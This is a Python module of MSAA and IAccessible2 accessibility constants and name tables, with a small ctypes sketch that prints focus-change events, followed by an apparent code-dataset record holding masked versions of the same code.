0x800a: u'EVENT_OBJECT_STATECHANGE',
0x800b: u'EVENT_OBJECT_LOCATIONCHANGE',
0x800c: u'EVENT_OBJECT_NAMECHANGE',
0x800d: u'EVENT_OBJECT_DESCRIPTIONCHANGE',
0x800e: u'EVENT_OBJECT_VALUECHANGE',
0x800f: u'EVENT_OBJECT_PARENTCHANGE',
0x8010: u'EVENT_OBJECT_HELPCHANGE',
0x8011: u'EVENT_OBJECT_DEFACTIONCHANGE',
0x8012: u'EVENT_OBJECT_ACCELERATORCHANGE'}
winEventIDsToEventNames={}
for _sym, _val in list(locals().items()): # copy the items: the loop itself binds _sym/_val into this namespace
if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):
winEventIDsToEventNames[_val] = _sym
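# Added sketch (not in the original module): a hypothetical minimal listener built
# on these constants via ctypes. The callback signature follows the Win32
# WinEventProc contract; error handling and cleanup on Ctrl+C are omitted.
if __name__ == '__main__':
    import ctypes
    import ctypes.wintypes

    WinEventProcType = ctypes.WINFUNCTYPE(
        None,
        ctypes.wintypes.HANDLE,  # hWinEventHook
        ctypes.wintypes.DWORD,   # event
        ctypes.wintypes.HWND,    # hwnd
        ctypes.wintypes.LONG,    # idObject
        ctypes.wintypes.LONG,    # idChild
        ctypes.wintypes.DWORD,   # idEventThread
        ctypes.wintypes.DWORD,   # dwmsEventTime
    )

    @WinEventProcType
    def on_event(hook, event, hwnd, idObject, idChild, thread, time_ms):
        print(winEventIDsToEventNames.get(event, hex(event)))

    user32 = ctypes.windll.user32
    hook = user32.SetWinEventHook(
        EVENT_OBJECT_FOCUS, EVENT_OBJECT_FOCUS,  # focus changes only
        0, on_event, 0, 0,
        WINEVENT_OUTOFCONTEXT | WINEVENT_SKIPOWNPROCESS)
    msg = ctypes.wintypes.MSG()
    while user32.GetMessageW(ctypes.byref(msg), 0, 0, 0):
        user32.TranslateMessage(ctypes.byref(msg))
        user32.DispatchMessageW(ctypes.byref(msg))
    user32.UnhookWinEvent(hook)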
|
normal
|
{
"blob_id": "5ec2ac3e0d66026da1b0c957d10c95e95c201f8f",
"index": 9032,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _sym, _val in locals().items():\n if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):\n winEventIDsToEventNames[_val] = _sym\n",
"step-3": "<mask token>\nCHILDID_SELF = 0\nIA2_TEXT_OFFSET_LENGTH = -1\nIA2_TEXT_OFFSET_CARET = -2\nROLE_SYSTEM_ALERT = 8\nROLE_SYSTEM_ANIMATION = 54\nROLE_SYSTEM_APPLICATION = 14\nROLE_SYSTEM_BORDER = 19\nROLE_SYSTEM_BUTTONDROPDOWN = 56\nROLE_SYSTEM_BUTTONDROPDOWNGRID = 58\nROLE_SYSTEM_BUTTONMENU = 57\nROLE_SYSTEM_CARET = 7\nROLE_SYSTEM_CELL = 29\nROLE_SYSTEM_CHARACTER = 32\nROLE_SYSTEM_CHART = 17\nROLE_SYSTEM_CHECKBUTTON = 44\nROLE_SYSTEM_CLIENT = 10\nROLE_SYSTEM_CLOCK = 61\nROLE_SYSTEM_COLUMN = 27\nROLE_SYSTEM_COLUMNHEADER = 25\nROLE_SYSTEM_COMBOBOX = 46\nROLE_SYSTEM_CURSOR = 6\nROLE_SYSTEM_DIAGRAM = 53\nROLE_SYSTEM_DIAL = 49\nROLE_SYSTEM_DIALOG = 18\nROLE_SYSTEM_DOCUMENT = 15\nROLE_SYSTEM_DROPLIST = 47\nROLE_SYSTEM_EQUATION = 55\nROLE_SYSTEM_GRAPHIC = 40\nROLE_SYSTEM_GRIP = 4\nROLE_SYSTEM_GROUPING = 20\nROLE_SYSTEM_HELPBALLOON = 31\nROLE_SYSTEM_HOTKEYFIELD = 50\nROLE_SYSTEM_INDICATOR = 39\nROLE_SYSTEM_LINK = 30\nROLE_SYSTEM_LIST = 33\nROLE_SYSTEM_LISTITEM = 34\nROLE_SYSTEM_MENUBAR = 2\nROLE_SYSTEM_MENUITEM = 12\nROLE_SYSTEM_MENUPOPUP = 11\nROLE_SYSTEM_OUTLINE = 35\nROLE_SYSTEM_OUTLINEITEM = 36\nROLE_SYSTEM_PAGETAB = 37\nROLE_SYSTEM_PAGETABLIST = 60\nROLE_SYSTEM_PANE = 16\nROLE_SYSTEM_PROGRESSBAR = 48\nROLE_SYSTEM_PROPERTYPAGE = 38\nROLE_SYSTEM_PUSHBUTTON = 43\nROLE_SYSTEM_RADIOBUTTON = 45\nROLE_SYSTEM_ROW = 28\nROLE_SYSTEM_ROWHEADER = 26\nROLE_SYSTEM_SCROLLBAR = 3\nROLE_SYSTEM_SEPARATOR = 21\nROLE_SYSTEM_SLIDER = 51\nROLE_SYSTEM_SOUND = 5\nROLE_SYSTEM_SPINBUTTON = 52\nROLE_SYSTEM_STATICTEXT = 41\nROLE_SYSTEM_STATUSBAR = 23\nROLE_SYSTEM_TABLE = 24\nROLE_SYSTEM_TEXT = 42\nROLE_SYSTEM_TITLEBAR = 1\nROLE_SYSTEM_TOOLBAR = 22\nROLE_SYSTEM_TOOLTIP = 13\nROLE_SYSTEM_WHITESPACE = 59\nROLE_SYSTEM_WINDOW = 9\nIA2_ROLE_UNKNOWN = 0\nIA2_ROLE_CANVAS = 1025\nIA2_ROLE_CAPTION = 1026\nIA2_ROLE_CHECK_MENU_ITEM = 1027\nIA2_ROLE_COLOR_CHOOSER = 1028\nIA2_ROLE_DATE_EDITOR = 1029\nIA2_ROLE_DESKTOP_ICON = 1030\nIA2_ROLE_DESKTOP_PANE = 1031\nIA2_ROLE_DIRECTORY_PANE = 1032\nIA2_ROLE_EDITBAR = 1033\nIA2_ROLE_EMBEDDED_OBJECT = 1034\nIA2_ROLE_ENDNOTE = 1035\nIA2_ROLE_FILE_CHOOSER = 1036\nIA2_ROLE_FONT_CHOOSER = 1037\nIA2_ROLE_FOOTER = 1038\nIA2_ROLE_FOOTNOTE = 1039\nIA2_ROLE_FORM = 1040\nIA2_ROLE_FRAME = 1041\nIA2_ROLE_GLASS_PANE = 1042\nIA2_ROLE_HEADER = 1043\nIA2_ROLE_HEADING = 1044\nIA2_ROLE_ICON = 1045\nIA2_ROLE_IMAGE_MAP = 1046\nIA2_ROLE_INPUT_METHOD_WINDOW = 1047\nIA2_ROLE_INTERNAL_FRAME = 1048\nIA2_ROLE_LABEL = 1049\nIA2_ROLE_LAYERED_PANE = 1050\nIA2_ROLE_NOTE = 1051\nIA2_ROLE_OPTION_PANE = 1052\nIA2_ROLE_PAGE = 1053\nIA2_ROLE_PARAGRAPH = 1054\nIA2_ROLE_RADIO_MENU_ITEM = 1055\nIA2_ROLE_REDUNDANT_OBJECT = 1056\nIA2_ROLE_ROOT_PANE = 1057\nIA2_ROLE_RULER = 1058\nIA2_ROLE_SCROLL_PANE = 1059\nIA2_ROLE_SECTION = 1060\nIA2_ROLE_SHAPE = 1061\nIA2_ROLE_SPLIT_PANE = 1062\nIA2_ROLE_TEAR_OFF_MENU = 1063\nIA2_ROLE_TERMINAL = 1064\nIA2_ROLE_TEXT_FRAME = 1065\nIA2_ROLE_TOGGLE_BUTTON = 1066\nIA2_ROLE_VIEW_PORT = 1067\nIA2_ROLE_COMPLEMENTARY_CONTENT = 1068\nIA2_ROLE_LANDMARK = 1069\nUNLOCALIZED_ROLE_NAMES = {(1): u'ROLE_SYSTEM_TITLEBAR', (2):\n u'ROLE_SYSTEM_MENUBAR', (3): u'ROLE_SYSTEM_SCROLLBAR', (4):\n u'ROLE_SYSTEM_GRIP', (5): u'ROLE_SYSTEM_SOUND', (6):\n u'ROLE_SYSTEM_CURSOR', (7): u'ROLE_SYSTEM_CARET', (8):\n u'ROLE_SYSTEM_ALERT', (9): u'ROLE_SYSTEM_WINDOW', (10):\n u'ROLE_SYSTEM_CLIENT', (11): u'ROLE_SYSTEM_MENUPOPUP', (12):\n u'ROLE_SYSTEM_MENUITEM', (13): u'ROLE_SYSTEM_TOOLTIP', (14):\n u'ROLE_SYSTEM_APPLICATION', (15): u'ROLE_SYSTEM_DOCUMENT', (16):\n u'ROLE_SYSTEM_PANE', (17): u'ROLE_SYSTEM_CHART', (18):\n 
u'ROLE_SYSTEM_DIALOG', (19): u'ROLE_SYSTEM_BORDER', (20):\n u'ROLE_SYSTEM_GROUPING', (21): u'ROLE_SYSTEM_SEPARATOR', (22):\n u'ROLE_SYSTEM_TOOLBAR', (23): u'ROLE_SYSTEM_STATUSBAR', (24):\n u'ROLE_SYSTEM_TABLE', (25): u'ROLE_SYSTEM_COLUMNHEADER', (26):\n u'ROLE_SYSTEM_ROWHEADER', (27): u'ROLE_SYSTEM_COLUMN', (28):\n u'ROLE_SYSTEM_ROW', (29): u'ROLE_SYSTEM_CELL', (30):\n u'ROLE_SYSTEM_LINK', (31): u'ROLE_SYSTEM_HELPBALLOON', (32):\n u'ROLE_SYSTEM_CHARACTER', (33): u'ROLE_SYSTEM_LIST', (34):\n u'ROLE_SYSTEM_LISTITEM', (35): u'ROLE_SYSTEM_OUTLINE', (36):\n u'ROLE_SYSTEM_OUTLINEITEM', (37): u'ROLE_SYSTEM_PAGETAB', (38):\n u'ROLE_SYSTEM_PROPERTYPAGE', (39): u'ROLE_SYSTEM_INDICATOR', (40):\n u'ROLE_SYSTEM_GRAPHIC', (41): u'ROLE_SYSTEM_STATICTEXT', (42):\n u'ROLE_SYSTEM_TEXT', (43): u'ROLE_SYSTEM_PUSHBUTTON', (44):\n u'ROLE_SYSTEM_CHECKBUTTON', (45): u'ROLE_SYSTEM_RADIOBUTTON', (46):\n u'ROLE_SYSTEM_COMBOBOX', (47): u'ROLE_SYSTEM_DROPLIST', (48):\n u'ROLE_SYSTEM_PROGRESSBAR', (49): u'ROLE_SYSTEM_DIAL', (50):\n u'ROLE_SYSTEM_HOTKEYFIELD', (51): u'ROLE_SYSTEM_SLIDER', (52):\n u'ROLE_SYSTEM_SPINBUTTON', (53): u'ROLE_SYSTEM_DIAGRAM', (54):\n u'ROLE_SYSTEM_ANIMATION', (55): u'ROLE_SYSTEM_EQUATION', (56):\n u'ROLE_SYSTEM_BUTTONDROPDOWN', (57): u'ROLE_SYSTEM_BUTTONMENU', (58):\n u'ROLE_SYSTEM_BUTTONDROPDOWNGRID', (59): u'ROLE_SYSTEM_WHITESPACE', (60\n ): u'ROLE_SYSTEM_PAGETABLIST', (61): u'ROLE_SYSTEM_CLOCK'}\nUNLOCALIZED_IA2_ROLE_NAMES = {(0): u'IA2_ROLE_UNKNOWN', (1025):\n u'IA2_ROLE_CANVAS', (1026): u'IA2_ROLE_CAPTION', (1027):\n u'IA2_ROLE_CHECK_MENU_ITEM', (1028): u'IA2_ROLE_COLOR_CHOOSER', (1029):\n u'IA2_ROLE_DATE_EDITOR', (1030): u'IA2_ROLE_DESKTOP_ICON', (1031):\n u'IA2_ROLE_DESKTOP_PANE', (1032): u'IA2_ROLE_DIRECTORY_PANE', (1033):\n u'IA2_ROLE_EDITBAR', (1034): u'IA2_ROLE_EMBEDDED_OBJECT', (1035):\n u'IA2_ROLE_ENDNOTE', (1036): u'IA2_ROLE_FILE_CHOOSER', (1037):\n u'IA2_ROLE_FONT_CHOOSER', (1038): u'IA2_ROLE_FOOTER', (1039):\n u'IA2_ROLE_FOOTNOTE', (1040): u'IA2_ROLE_FORM', (1041):\n u'IA2_ROLE_FRAME', (1042): u'IA2_ROLE_GLASS_PANE', (1043):\n u'IA2_ROLE_HEADER', (1044): u'IA2_ROLE_HEADING', (1045):\n u'IA2_ROLE_ICON', (1046): u'IA2_ROLE_IMAGE_MAP', (1047):\n u'IA2_ROLE_INPUT_METHOD_WINDOW', (1048): u'IA2_ROLE_INTERNAL_FRAME', (\n 1049): u'IA2_ROLE_LABEL', (1050): u'IA2_ROLE_LAYERED_PANE', (1051):\n u'IA2_ROLE_NOTE', (1052): u'IA2_ROLE_OPTION_PANE', (1053):\n u'IA2_ROLE_PAGE', (1054): u'IA2_ROLE_PARAGRAPH', (1055):\n u'IA2_ROLE_RADIO_MENU_ITEM', (1056): u'IA2_ROLE_REDUNDANT_OBJECT', (\n 1057): u'IA2_ROLE_ROOT_PANE', (1058): u'IA2_ROLE_RULER', (1059):\n u'IA2_ROLE_SCROLL_PANE', (1060): u'IA2_ROLE_SECTION', (1061):\n u'IA2_ROLE_SHAPE', (1062): u'IA2_ROLE_SPLIT_PANE', (1063):\n u'IA2_ROLE_TEAR_OFF_MENU', (1064): u'IA2_ROLE_TERMINAL', (1065):\n u'IA2_ROLE_TEXT_FRAME', (1066): u'IA2_ROLE_TOGGLE_BUTTON', (1067):\n u'IA2_ROLE_VIEW_PORT', (1068): u'IA2_ROLE_COMPLEMENTARY_CONTENT', (1069\n ): u'IA2_ROLE_LANDMARK'}\nNAVDIR_DOWN = 2\nNAVDIR_FIRSTCHILD = 7\nNAVDIR_LASTCHILD = 8\nNAVDIR_LEFT = 3\nNAVDIR_NEXT = 5\nNAVDIR_PREVIOUS = 6\nNAVDIR_RIGHT = 4\nNAVDIR_UP = 1\nSTATE_SYSTEM_UNAVAILABLE = 1\nSTATE_SYSTEM_SELECTED = 2\nSTATE_SYSTEM_FOCUSED = 4\nSTATE_SYSTEM_PRESSED = 8\nSTATE_SYSTEM_CHECKED = 16\nSTATE_SYSTEM_MIXED = 32\nSTATE_SYSTEM_READONLY = 64\nSTATE_SYSTEM_HOTTRACKED = 128\nSTATE_SYSTEM_DEFAULT = 256\nSTATE_SYSTEM_EXPANDED = 512\nSTATE_SYSTEM_COLLAPSED = 1024\nSTATE_SYSTEM_BUSY = 2048\nSTATE_SYSTEM_FLOATING = 4096\nSTATE_SYSTEM_MARQUEED = 8192\nSTATE_SYSTEM_ANIMATED = 16384\nSTATE_SYSTEM_INVISIBLE = 
32768\nSTATE_SYSTEM_OFFSCREEN = 65536\nSTATE_SYSTEM_SIZEABLE = 131072\nSTATE_SYSTEM_MOVEABLE = 262144\nSTATE_SYSTEM_SELFVOICING = 524288\nSTATE_SYSTEM_FOCUSABLE = 1048576\nSTATE_SYSTEM_SELECTABLE = 2097152\nSTATE_SYSTEM_LINKED = 4194304\nSTATE_SYSTEM_TRAVERSED = 8388608\nSTATE_SYSTEM_MULTISELECTABLE = 16777216\nSTATE_SYSTEM_EXTSELECTABLE = 33554432\nSTATE_SYSTEM_HASSUBMENU = 67108864\nSTATE_SYSTEM_ALERT_LOW = 67108864\nSTATE_SYSTEM_ALERT_MEDIUM = 134217728\nSTATE_SYSTEM_ALERT_HIGH = 268435456\nSTATE_SYSTEM_PROTECTED = 536870912\nSTATE_SYSTEM_HASPOPUP = 1073741824\nSTATE_SYSTEM_VALID = 536870911\nUNLOCALIZED_STATE_NAMES = {(1): u'STATE_SYSTEM_UNAVAILABLE', (2):\n u'STATE_SYSTEM_SELECTED', (4): u'STATE_SYSTEM_FOCUSED', (8):\n u'STATE_SYSTEM_PRESSED', (16): u'STATE_SYSTEM_CHECKED', (32):\n u'STATE_SYSTEM_MIXED', (64): u'STATE_SYSTEM_READONLY', (128):\n u'STATE_SYSTEM_HOTTRACKED', (256): u'STATE_SYSTEM_DEFAULT', (512):\n u'STATE_SYSTEM_EXPANDED', (1024): u'STATE_SYSTEM_COLLAPSED', (2048):\n u'STATE_SYSTEM_BUSY', (4096): u'STATE_SYSTEM_FLOATING', (8192):\n u'STATE_SYSTEM_MARQUEED', (16384): u'STATE_SYSTEM_ANIMATED', (32768):\n u'STATE_SYSTEM_INVISIBLE', (65536): u'STATE_SYSTEM_OFFSCREEN', (131072):\n u'STATE_SYSTEM_SIZEABLE', (262144): u'STATE_SYSTEM_MOVEABLE', (524288):\n u'STATE_SYSTEM_SELFVOICING', (1048576): u'STATE_SYSTEM_FOCUSABLE', (\n 2097152): u'STATE_SYSTEM_SELECTABLE', (4194304): u'STATE_SYSTEM_LINKED',\n (8388608): u'STATE_SYSTEM_TRAVERSED', (16777216):\n u'STATE_SYSTEM_MULTISELECTABLE', (33554432):\n u'STATE_SYSTEM_EXTSELECTABLE', (67108864): u'STATE_SYSTEM_ALERT_LOW', (\n 134217728): u'STATE_SYSTEM_ALERT_MEDIUM', (268435456):\n u'STATE_SYSTEM_ALERT_HIGH', (536870912): u'STATE_SYSTEM_PROTECTED', (\n 1073741824): u'STATE_SYSTEM_HASPOPUP', (536870911): u'STATE_SYSTEM_VALID'}\nIA2_STATE_ACTIVE = 1\nIA2_STATE_ARMED = 2\nIA2_STATE_DEFUNCT = 4\nIA2_STATE_EDITABLE = 8\nIA2_STATE_HORIZONTAL = 16\nIA2_STATE_ICONIFIED = 32\nIA2_STATE_INVALID_ENTRY = 64\nIA2_STATE_MANAGES_DESCENDANTS = 128\nIA2_STATE_MODAL = 256\nIA2_STATE_MULTI_LINE = 512\nIA2_STATE_OPAQUE = 1024\nIA2_STATE_REQUIRED = 2048\nIA2_STATE_SELECTABLE_TEXT = 4096\nIA2_STATE_SINGLE_LINE = 8192\nIA2_STATE_STALE = 16384\nIA2_STATE_SUPPORTS_AUTOCOMPLETION = 32768\nIA2_STATE_TRANSIENT = 65536\nIA2_STATE_VERTICAL = 131072\nIA2_STATE_CHECKABLE = 262144\nIA2_STATE_PINNED = 524288\nUNLOCALIZED_IA2_STATE_NAMES = {(1): u'IA2_STATE_ACTIVE', (2):\n u'IA2_STATE_ARMED', (4): u'IA2_STATE_DEFUNCT', (8):\n u'IA2_STATE_EDITABLE', (16): u'IA2_STATE_HORIZONTAL', (32):\n u'IA2_STATE_ICONIFIED', (64): u'IA2_STATE_INVALID_ENTRY', (128):\n u'IA2_STATE_MANAGES_DESCENDANTS', (256): u'IA2_STATE_MODAL', (512):\n u'IA2_STATE_MULTI_LINE', (1024): u'IA2_STATE_OPAQUE', (2048):\n u'IA2_STATE_REQUIRED', (4096): u'IA2_STATE_SELECTABLE_TEXT', (8192):\n u'IA2_STATE_SINGLE_LINE', (16384): u'IA2_STATE_STALE', (32768):\n u'IA2_STATE_SUPPORTS_AUTOCOMPLETION', (65536): u'IA2_STATE_TRANSIENT',\n (131072): u'IA2_STATE_VERTICAL', (262144): u'IA2_STATE_CHECKABLE', (\n 524288): u'IA2_STATE_PINNED'}\nUNLOCALIZED_IA2_RELATION_TYPES = {u'containingApplication':\n u'IA2_RELATION_CONTAINING_APPLICATION', u'containingDocument':\n u'IA2_RELATION_CONTAINING_DOCUMENT', u'containingTabPane':\n u'IA2_RELATION_CONTAINING_TAB_PANE', u'containingWindow':\n u'IA2_RELATION_CONTAINING_WINDOW', u'controlledBy':\n u'IA2_RELATION_CONTROLLED_BY', u'controllerFor':\n u'IA2_RELATION_CONTROLLER_FOR', u'describedBy':\n u'IA2_RELATION_DESCRIBED_BY', u'descriptionFor':\n u'IA2_RELATION_DESCRIPTION_FOR', 
u'details': u'IA2_RELATION_DETAILS',\n u'detailsFor': u'IA2_RELATION_DETAILS_FOR', u'embeddedBy':\n u'IA2_RELATION_EMBEDDED_BY', u'embeds': u'IA2_RELATION_EMBEDS',\n u'errorMessage': u'IA2_RELATION_ERROR_MESSAGE', u'errorFor':\n u'IA2_RELATION_ERROR_FOR', u'flowsFrom': u'IA2_RELATION_FLOWS_FROM',\n u'flowsTo': u'IA2_RELATION_FLOWS_TO', u'labelFor':\n u'IA2_RELATION_LABEL_FOR', u'labelledBy': u'IA2_RELATION_LABELED_BY',\n u'labelledBy': u'IA2_RELATION_LABELLED_BY', u'memberOf':\n u'IA2_RELATION_MEMBER_OF', u'nextTabbable':\n u'IA2_RELATION_NEXT_TABBABLE', u'nodeChildOf':\n u'IA2_RELATION_NODE_CHILD_OF', u'nodeParentOf':\n u'IA2_RELATION_NODE_PARENT_OF', u'parentWindowOf':\n u'IA2_RELATION_PARENT_WINDOW_OF', u'popupFor':\n u'IA2_RELATION_POPUP_FOR', u'previousTabbable':\n u'IA2_RELATION_PREVIOUS_TABBABLE', u'subwindowOf':\n u'IA2_RELATION_SUBWINDOW_OF'}\nWINEVENT_OUTOFCONTEXT = 0\nWINEVENT_SKIPOWNTHREAD = 1\nWINEVENT_SKIPOWNPROCESS = 2\nWINEVENT_INCONTEXT = 4\nEVENT_SYSTEM_SOUND = 1\nEVENT_SYSTEM_ALERT = 2\nEVENT_SYSTEM_FOREGROUND = 3\nEVENT_SYSTEM_MENUSTART = 4\nEVENT_SYSTEM_MENUEND = 5\nEVENT_SYSTEM_MENUPOPUPSTART = 6\nEVENT_SYSTEM_MENUPOPUPEND = 7\nEVENT_SYSTEM_CAPTURESTART = 8\nEVENT_SYSTEM_CAPTUREEND = 9\nEVENT_SYSTEM_MOVESIZESTART = 10\nEVENT_SYSTEM_MOVESIZEEND = 11\nEVENT_SYSTEM_CONTEXTHELPSTART = 12\nEVENT_SYSTEM_CONTEXTHELPEND = 13\nEVENT_SYSTEM_DRAGDROPSTART = 14\nEVENT_SYSTEM_DRAGDROPEND = 15\nEVENT_SYSTEM_DIALOGSTART = 16\nEVENT_SYSTEM_DIALOGEND = 17\nEVENT_SYSTEM_SCROLLINGSTART = 18\nEVENT_SYSTEM_SCROLLINGEND = 19\nEVENT_SYSTEM_SWITCHSTART = 20\nEVENT_SYSTEM_SWITCHEND = 21\nEVENT_SYSTEM_MINIMIZESTART = 22\nEVENT_SYSTEM_MINIMIZEEND = 23\nEVENT_OBJECT_CREATE = 32768\nEVENT_OBJECT_DESTROY = 32769\nEVENT_OBJECT_SHOW = 32770\nEVENT_OBJECT_HIDE = 32771\nEVENT_OBJECT_REORDER = 32772\nEVENT_OBJECT_FOCUS = 32773\nEVENT_OBJECT_SELECTION = 32774\nEVENT_OBJECT_SELECTIONADD = 32775\nEVENT_OBJECT_SELECTIONREMOVE = 32776\nEVENT_OBJECT_SELECTIONWITHIN = 32777\nEVENT_OBJECT_STATECHANGE = 32778\nEVENT_OBJECT_LOCATIONCHANGE = 32779\nEVENT_OBJECT_NAMECHANGE = 32780\nEVENT_OBJECT_DESCRIPTIONCHANGE = 32781\nEVENT_OBJECT_VALUECHANGE = 32782\nEVENT_OBJECT_PARENTCHANGE = 32783\nEVENT_OBJECT_HELPCHANGE = 32784\nEVENT_OBJECT_DEFACTIONCHANGE = 32785\nEVENT_OBJECT_ACCELERATORCHANGE = 32786\nEVENT_CONSOLE_CARET = 16385\nEVENT_CONSOLE_UPDATE_REGION = 16386\nEVENT_CONSOLE_UPDATE_SIMPLE = 16387\nEVENT_CONSOLE_UPDATE_SCROLL = 16388\nEVENT_CONSOLE_LAYOUT = 16389\nEVENT_CONSOLE_START_APPLICATION = 16390\nEVENT_CONSOLE_END_APPLICATION = 16391\nIA2_EVENT_ACTION_CHANGED = 257\nIA2_EVENT_ACTIVE_DECENDENT_CHANGED = 258\nIA2_EVENT_ACTIVE_DESCENDANT_CHANGED = 258\nIA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED = 259\nIA2_EVENT_DOCUMENT_CONTENT_CHANGED = 260\nIA2_EVENT_DOCUMENT_LOAD_COMPLETE = 261\nIA2_EVENT_DOCUMENT_LOAD_STOPPED = 262\nIA2_EVENT_DOCUMENT_RELOAD = 263\nIA2_EVENT_HYPERLINK_END_INDEX_CHANGED = 264\nIA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED = 265\nIA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED = 266\nIA2_EVENT_HYPERTEXT_LINK_ACTIVATED = 267\nIA2_EVENT_HYPERTEXT_LINK_SELECTED = 268\nIA2_EVENT_HYPERLINK_START_INDEX_CHANGED = 269\nIA2_EVENT_HYPERTEXT_CHANGED = 270\nIA2_EVENT_HYPERTEXT_NLINKS_CHANGED = 287\nIA2_EVENT_OBJECT_ATTRIBUTE_CHANGED = 288\nIA2_EVENT_PAGE_CHANGED = 273\nIA2_EVENT_SECTION_CHANGED = 274\nIA2_EVENT_TABLE_CAPTION_CHANGED = 275\nIA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED = 276\nIA2_EVENT_TABLE_COLUMN_HEADER_CHANGED = 277\nIA2_EVENT_TABLE_MODEL_CHANGED = 278\nIA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED = 
279\nIA2_EVENT_TABLE_ROW_HEADER_CHANGED = 280\nIA2_EVENT_TABLE_SUMMARY_CHANGED = 281\nIA2_EVENT_TEXT_ATTRIBUTE_CHANGED = 282\nIA2_EVENT_TEXT_CARET_MOVED = 283\nIA2_EVENT_TEXT_CHANGED = 284\nIA2_EVENT_TEXT_COLUMN_CHANGED = 285\nIA2_EVENT_TEXT_INSERTED = 286\nIA2_EVENT_TEXT_REMOVED = 287\nIA2_EVENT_TEXT_UPDATED = 288\nIA2_EVENT_TEXT_SELECTION_CHANGED = 289\nIA2_EVENT_VISIBLE_DATA_CHANGED = 290\nUNLOCALIZED_EVENT_NAMES = {(1): u'EVENT_SYSTEM_SOUND', (2):\n u'EVENT_SYSTEM_ALERT', (3): u'EVENT_SYSTEM_FOREGROUND', (4):\n u'EVENT_SYSTEM_MENUSTART', (5): u'EVENT_SYSTEM_MENUEND', (6):\n u'EVENT_SYSTEM_MENUPOPUPSTART', (7): u'EVENT_SYSTEM_MENUPOPUPEND', (8):\n u'EVENT_SYSTEM_CAPTURESTART', (9): u'EVENT_SYSTEM_CAPTUREEND', (10):\n u'EVENT_SYSTEM_MOVESIZESTART', (11): u'EVENT_SYSTEM_MOVESIZEEND', (12):\n u'EVENT_SYSTEM_CONTEXTHELPSTART', (13): u'EVENT_SYSTEM_CONTEXTHELPEND',\n (14): u'EVENT_SYSTEM_DRAGDROPSTART', (15): u'EVENT_SYSTEM_DRAGDROPEND',\n (16): u'EVENT_SYSTEM_DIALOGSTART', (17): u'EVENT_SYSTEM_DIALOGEND', (18\n ): u'EVENT_SYSTEM_SCROLLINGSTART', (19): u'EVENT_SYSTEM_SCROLLINGEND',\n (20): u'EVENT_SYSTEM_SWITCHSTART', (21): u'EVENT_SYSTEM_SWITCHEND', (22\n ): u'EVENT_SYSTEM_MINIMIZESTART', (23): u'EVENT_SYSTEM_MINIMIZEEND', (\n 257): u'IA2_EVENT_ACTION_CHANGED', (258):\n u'IA2_EVENT_ACTIVE_DESCENDANT_CHANGED', (259):\n u'IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED', (260):\n u'IA2_EVENT_DOCUMENT_CONTENT_CHANGED', (261):\n u'IA2_EVENT_DOCUMENT_LOAD_COMPLETE', (262):\n u'IA2_EVENT_DOCUMENT_LOAD_STOPPED', (263): u'IA2_EVENT_DOCUMENT_RELOAD',\n (264): u'IA2_EVENT_HYPERLINK_END_INDEX_CHANGED', (265):\n u'IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED', (266):\n u'IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED', (267):\n u'IA2_EVENT_HYPERTEXT_LINK_ACTIVATED', (268):\n u'IA2_EVENT_HYPERTEXT_LINK_SELECTED', (269):\n u'IA2_EVENT_HYPERLINK_START_INDEX_CHANGED', (270):\n u'IA2_EVENT_HYPERTEXT_CHANGED', (271):\n u'IA2_EVENT_HYPERTEXT_NLINKS_CHANGED', (272):\n u'IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED', (273): u'IA2_EVENT_PAGE_CHANGED',\n (274): u'IA2_EVENT_SECTION_CHANGED', (275):\n u'IA2_EVENT_TABLE_CAPTION_CHANGED', (276):\n u'IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED', (277):\n u'IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED', (278):\n u'IA2_EVENT_TABLE_MODEL_CHANGED', (279):\n u'IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED', (280):\n u'IA2_EVENT_TABLE_ROW_HEADER_CHANGED', (281):\n u'IA2_EVENT_TABLE_SUMMARY_CHANGED', (282):\n u'IA2_EVENT_TEXT_ATTRIBUTE_CHANGED', (283):\n u'IA2_EVENT_TEXT_CARET_MOVED', (284): u'IA2_EVENT_TEXT_CHANGED', (285):\n u'IA2_EVENT_TEXT_COLUMN_CHANGED', (286): u'IA2_EVENT_TEXT_INSERTED', (\n 287): u'IA2_EVENT_TEXT_REMOVED', (288): u'IA2_EVENT_TEXT_UPDATED', (289\n ): u'IA2_EVENT_TEXT_SELECTION_CHANGED', (290):\n u'IA2_EVENT_VISIBLE_DATA_CHANGED', (16385): u'EVENT_CONSOLE_CARET', (\n 16386): u'EVENT_CONSOLE_UPDATE_REGION', (16387):\n u'EVENT_CONSOLE_UPDATE_SIMPLE', (16388): u'EVENT_CONSOLE_UPDATE_SCROLL',\n (16389): u'EVENT_CONSOLE_LAYOUT', (16390):\n u'EVENT_CONSOLE_START_APPLICATION', (16391):\n u'EVENT_CONSOLE_END_APPLICATION', (32768): u'EVENT_OBJECT_CREATE', (\n 32769): u'EVENT_OBJECT_DESTROY', (32770): u'EVENT_OBJECT_SHOW', (32771):\n u'EVENT_OBJECT_HIDE', (32772): u'EVENT_OBJECT_REORDER', (32773):\n u'EVENT_OBJECT_FOCUS', (32774): u'EVENT_OBJECT_SELECTION', (32775):\n u'EVENT_OBJECT_SELECTIONADD', (32776): u'EVENT_OBJECT_SELECTIONREMOVE',\n (32777): u'EVENT_OBJECT_SELECTIONWITHIN', (32778):\n u'EVENT_OBJECT_STATECHANGE', (32779): u'EVENT_OBJECT_LOCATIONCHANGE', (\n 32780): u'EVENT_OBJECT_NAMECHANGE', 
